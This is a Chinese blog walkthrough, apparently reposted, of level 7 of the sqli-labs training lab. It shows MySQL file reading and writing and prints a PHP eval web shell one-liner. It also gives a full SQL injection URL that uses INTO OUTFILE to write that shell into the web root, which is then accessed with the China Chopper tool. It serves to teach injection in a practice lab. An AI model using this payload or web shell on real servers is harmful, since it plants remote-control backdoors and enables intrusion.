sqli lab less7

时间：2020-01-22 16:39:20 阅读：117 评论：0 收藏：0 [点我收藏+]

标签：eva read aix show 图片读取 ima 路径 ESS

Less7

1.文件读写权限问题

show variables like ‘%secure%‘;查看 secure-file-priv 当前的值，如果显示为NULL，则需要打开
C:\phpstudy\PHPTutorial\MySQL\my.ini文件，在其中加上一句：secure_file_priv=“/”。

技术图片

重启服务再show 就显示了

技术图片

2一句话木马：php版本：<?php @eval($_POST[“crow”]);?> 其中crow是密码

一句话木马大多配合中国菜刀使用，菜刀的使用可以参考：https://www.daixiaorui.com/read/17.html

3. load_file() 读取本地文件 select load_file(‘C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.txt’);

4. into outfile 写文件

用法： select ‘mysql is very good‘ into outfile ‘test1.txt‘;

技术图片

文件位置： C:\phpstudy\\MySQL\data

或者是select ‘crow 666‘ into outfile ‘C:\\phpstudy\\WWW\\sqli\\Less-7\\test.txt’;
文件位置： C:\phpstudy\WWW\sqli\Less-7
注意事项： \\

技术图片

有错误证明存在注入

技术图片

之后我们用outfile将一句话木马写入文件，虽然依然显示报错，但是我们发现路径下已经存在了我们想要的文件

http://192.168.50.100/sqli-labs/Less-7/?id=-1‘)) union select 1,2,‘<?php @eval($_POST[“crow”]);?>‘ into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php" --+

技术图片

使用中国菜刀链接

技术图片

使用中国菜刀访问即可

sqli lab less7

标签：eva read aix show 图片读取 ima 路径 ESS

原文地址：https://www.cnblogs.com/xingyuner/p/12228551.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行